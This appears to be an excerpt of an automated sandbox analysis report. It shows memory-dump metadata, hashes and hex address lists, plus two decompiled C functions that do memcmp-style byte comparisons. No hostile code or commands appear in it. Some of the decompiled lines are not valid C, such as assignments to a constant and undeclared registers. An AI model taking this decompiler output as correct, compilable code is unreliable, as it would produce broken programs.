0x000b9454
0x000b9426
0x000b9429
0x000b9432
0x00000000
0x00000000
0x00000000
0x000b9432
0x000b9404
0x000b9407
0x000b9410
0x00000000
0x00000000
0x00000000
0x000b9410
0x000b8b77
0x000b8b77
0x000b9967

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: fafb1369d13ccc3d18e8f18d3f8e7929ed5457f253d7de3d9572a75b449c38f3
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: A4C1D6762091934ADFAD4639C4348BEBBE55FA27B131A476DD4B3CB4E4EF20C924D620

Uniqueness

Uniqueness Score: -1.00%

Function 000B8B7F, Relevance: .3, Instructions: 331
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000B8B7F(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}

0x000b8b7f
0x000b8b7f
0x000b8b85
0x000b8bfc
0x000b8bfe
0x000b8c00
0x00000000
0x00000000
0x000b8c06
0x000b8c0c
0x000b8c93
0x000b8c95
0x000b8c97
0x00000000
0x00000000
0x000b8c9d
0x000b8ca3
0x000b8d2a
0x000b8d2c
0x000b8d2e
0x00000000
0x00000000
0x000b8d34
0x000b8d3a
0x000b8dc1
0x000b8dc3
0x000b8dc5
0x00000000
0x00000000
0x000b8dcb
0x000b8dd1
0x000b8e58
0x000b8e5a
0x000b8e5c
0x00000000
0x00000000
0x000b8e68
0x000b8ef0
0x000b8ef2
0x000b8ef4
0x00000000
0x00000000
0x000b8efa
0x000b8f00
0x000b8f87
0x000b8f89
0x000b8f8b
0x000b8f99
0x000b8f9b
0x000b8fa8
0x000b8fa8
0x000b8f9b
0x00000000
0x000b8f8b
0x000b8f0d
0x000b8f0f
0x000b8f27
0x000b8f2f
0x000b8f31
0x000b8f49
0x000b8f51
0x000b8f53
0x000b8f6b
0x000b8f73
0x000b8f75
0x000b8f7e
0x000b8f7e
0x00000000
0x000b8f75
0x000b8f5c
0x000b8f65
0x00000000
0x00000000
0x00000000
0x000b8f65
0x000b8f3a
0x000b8f43
0x00000000
0x00000000
0x00000000
0x000b8f43
0x000b8f18
0x000b8f21
0x00000000
0x00000000
0x00000000
0x000b8f21
0x000b8e76
0x000b8e78
0x000b8e90
0x000b8e98
0x000b8e9a
0x000b8eb2
0x000b8eba
0x000b8ebc
0x000b8ed4
0x000b8edc
0x000b8ede
0x000b8ee7
0x000b8ee7
0x00000000
0x000b8ede
0x000b8ec5
0x000b8ece
0x00000000
0x00000000
0x00000000
0x000b8ece
0x000b8ea3
0x000b8eac
0x00000000
0x00000000
0x00000000
0x000b8eac
0x000b8e81
0x000b8e8a
0x00000000
0x00000000
0x00000000
0x000b8e8a
0x000b8dde
0x000b8de0
0x000b8df8
0x000b8e00
0x000b8e02
0x000b8e1a
0x000b8e22
0x000b8e24
0x000b8e3c
0x000b8e44
0x000b8e46
0x000b8e4f
0x000b8e4f
0x00000000
0x000b8e46
0x000b8e2d
0x000b8e36
0x00000000
0x00000000
0x00000000
0x000b8e36
0x000b8e0b
0x000b8e14
0x00000000
0x00000000
0x00000000
0x000b8e14
0x000b8de9
0x000b8df2
0x00000000
0x00000000
0x00000000
0x000b8df2
0x000b8d47
0x000b8d49
0x000b8d61
0x000b8d69
0x000b8d6b
0x000b8d83
0x000b8d8b
0x000b8d8d
0x000b8da5
0x000b8dad
0x000b8daf
0x000b8db8
0x000b8db8
0x00000000
0x000b8daf
0x000b8d96
0x000b8d9f
0x00000000
0x00000000
0x00000000
0x000b8d9f
0x000b8d74
0x000b8d7d
0x00000000
0x00000000
0x00000000
0x000b8d7d
0x000b8d52
0x000b8d5b
0x00000000
0x00000000
0x00000000
0x000b8d5b
0x000b8cb0
0x000b8cb2
0x000b8cca
0x000b8cd2
0x000b8cd4
0x000b8cec
0x000b8cf4
0x000b8cf6
0x000b8d0e
0x000b8d16
0x000b8d18
0x000b8d21
0x000b8d21
0x00000000
0x000b8d18
0x000b8cff
0x000b8d08
0x00000000
0x00000000
0x00000000
0x000b8d08
0x000b8cdd
0x000b8ce6
0x00000000
0x00000000
0x00000000
0x000b8ce6
0x000b8cbb
0x000b8cc4
0x00000000
0x00000000
0x00000000
0x000b8cc4
0x000b8c19
0x000b8c1b
0x000b8c33
0x000b8c3b
0x000b8c3d
0x000b8c55
0x000b8c5d
0x000b8c5f
0x000b8c77
0x000b8c7f
0x000b8c81
0x000b8c8a
0x000b8c8a
0x00000000
0x000b8c81
0x000b8c68
0x000b8c71
0x00000000
0x00000000
0x00000000
0x000b8c71
0x000b8c46
0x000b8c4f
0x00000000
0x00000000
0x00000000
0x000b8c4f
0x000b8c24
0x000b8c2d
0x00000000
0x00000000
0x00000000
0x000b8b87
0x000b8b87
0x000b8b8e
0x000b8b90
0x000b8ba4
0x000b8ba4
0x000b8bac
0x000b8bae
0x000b8bc2
0x000b8bc2
0x000b8bca
0x000b8bcc
0x000b8be0
0x000b8be0
0x000b8be8
0x000b8bea
0x000b8bf3
0x000b8bf3
0x00000000
0x000b8bea
0x000b8bd2
0x000b8bd5
0x000b8bde
0x00000000
0x00000000
0x00000000
0x000b8bde
0x000b8bb4
0x000b8bb7
0x000b8bc0
0x00000000
0x00000000
0x00000000
0x000b8bc0
0x000b8b96
0x000b8b99
0x000b8ba2
0x00000000
0x00000000
0x00000000
0x000b8ba2
0x000b8b77
0x000b8b77
0x000b9967

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: f93eae1b4161ac8ac3f2d090219e17ccfd752fe8df66c3c59d35b837a612056f
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 8AC1947620519349DFAD463984348BEBBE95BA27B131A876DD4B3CB4F4EF20C924D720

Uniqueness

Uniqueness Score: -1.00%

Function 000B8767, Relevance: .3, Instructions: 323
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000B8767(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}

0x000b8767
0x000b8767
0x000b8767
0x000b876d
0x000b87f4
0x000b87f6
0x000b87f8
0x000b8b77
0x000b8b77
0x000b9967
0x000b9967
0x000b87fe
0x000b8804
0x000b888b
0x000b888d
0x000b888f
0x00000000
0x00000000
0x000b8895
0x000b889b
0x000b8922
0x000b8924
0x000b8926
0x00000000
0x00000000
0x000b892c
0x000b8932
0x000b89b9
0x000b89bb
0x000b89bd
0x00000000
0x00000000
0x000b89c9
0x000b8a51
0x000b8a53
0x000b8a55
0x00000000
0x00000000
0x000b8a5b
0x000b8a61
0x000b8ae8
0x000b8aea
0x000b8aec
0x00000000
0x00000000
0x000b8af2
0x000b8af8
0x000b8b6f
0x000b8b71
0x000b8b73
0x000b8b75
0x000b8b75
0x00000000
0x000b8b73
0x000b8b01
0x000b8b03
0x000b8b17
0x000b8b1f
0x000b8b21
0x000b8b35
0x000b8b3d
0x000b8b3f
0x000b8b53
0x000b8b5b
0x000b8b5d
0x000b8b66
0x000b8b66
0x00000000
0x000b8b5d
0x000b8b48
0x000b8b51
0x00000000
0x00000000
0x00000000
0x000b8b51
0x000b8b2a
0x000b8b33
0x00000000
0x00000000
0x00000000
0x000b8b33
0x000b8b0c
0x000b8b15
0x00000000
0x00000000
0x00000000
0x000b8b15
0x000b8a6e
0x000b8a70
0x000b8a88
0x000b8a90
0x000b8a92
0x000b8aaa
0x000b8ab2
0x000b8ab4
0x000b8acc
0x000b8ad4
0x000b8ad6
0x000b8adf
0x000b8adf
0x00000000
0x000b8ad6
0x000b8abd
0x000b8ac6
0x00000000
0x00000000
0x00000000
0x000b8ac6
0x000b8a9b
0x000b8aa4
0x00000000
0x00000000
0x00000000
0x000b8aa4
0x000b8a79
0x000b8a82
0x00000000
0x00000000
0x00000000
0x000b8a82
0x000b89d7
0x000b89d9
0x000b89f1
0x000b89f9
0x000b89fb
0x000b8a13
0x000b8a1b
0x000b8a1d
0x000b8a35
0x000b8a3d
0x000b8a3f
0x000b8a48
0x000b8a48
0x00000000
0x000b8a3f
0x000b8a26
0x000b8a2f
0x00000000
0x00000000
0x00000000
0x000b8a2f
0x000b8a04
0x000b8a0d
0x00000000
0x00000000
0x00000000
0x000b8a0d
0x000b89e2
0x000b89eb
0x00000000
0x00000000
0x00000000
0x000b89eb
0x000b893f
0x000b8941
0x000b8959
0x000b8961
0x000b8963
0x000b897b
0x000b8983
0x000b8985
0x000b899d
0x000b89a5
0x000b89a7
0x000b89b0
0x000b89b0
0x00000000
0x000b89a7
0x000b898e
0x000b8997
0x00000000
0x00000000
0x00000000
0x000b8997
0x000b896c
0x000b8975
0x00000000
0x00000000
0x00000000
0x000b8975
0x000b894a
0x000b8953
0x00000000
0x00000000
0x00000000
0x000b8953
0x000b88a8
0x000b88aa
0x000b88c2
0x000b88ca
0x000b88cc
0x000b88e4
0x000b88ec
0x000b88ee
0x000b8906
0x000b890e
0x000b8910
0x000b8919
0x000b8919
0x00000000
0x000b8910
0x000b88f7
0x000b8900
0x00000000
0x00000000
0x00000000
0x000b8900
0x000b88d5
0x000b88de
0x00000000
0x00000000
0x00000000
0x000b88de
0x000b88b3
0x000b88bc
0x00000000
0x00000000
0x00000000
0x000b88bc
0x000b8811
0x000b8813
0x000b882b
0x000b8833
0x000b8835
0x000b884d
0x000b8855
0x000b8857
0x000b886f
0x000b8877
0x000b8879
0x000b8882
0x000b8882
0x00000000
0x000b8879
0x000b8860
0x000b8869
0x00000000
0x00000000
0x00000000
0x000b8869
0x000b883e
0x000b8847
0x00000000
0x00000000
0x00000000
0x000b8847
0x000b881c
0x000b8825
0x00000000
0x00000000
0x00000000
0x000b8825
0x000b877a
0x000b877c
0x000b8794
0x000b879c
0x000b879e
0x000b87b6
0x000b87be
0x000b87c0
0x000b87d8
0x000b87e0
0x000b87e2
0x000b87eb
0x000b87eb
0x00000000
0x000b87e2
0x000b87c9
0x000b87d2
0x00000000
0x00000000
0x00000000
0x000b87d2
0x000b87a7
0x000b87b0
0x00000000
0x00000000
0x00000000
0x000b87b0
0x000b8785
0x000b878e
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
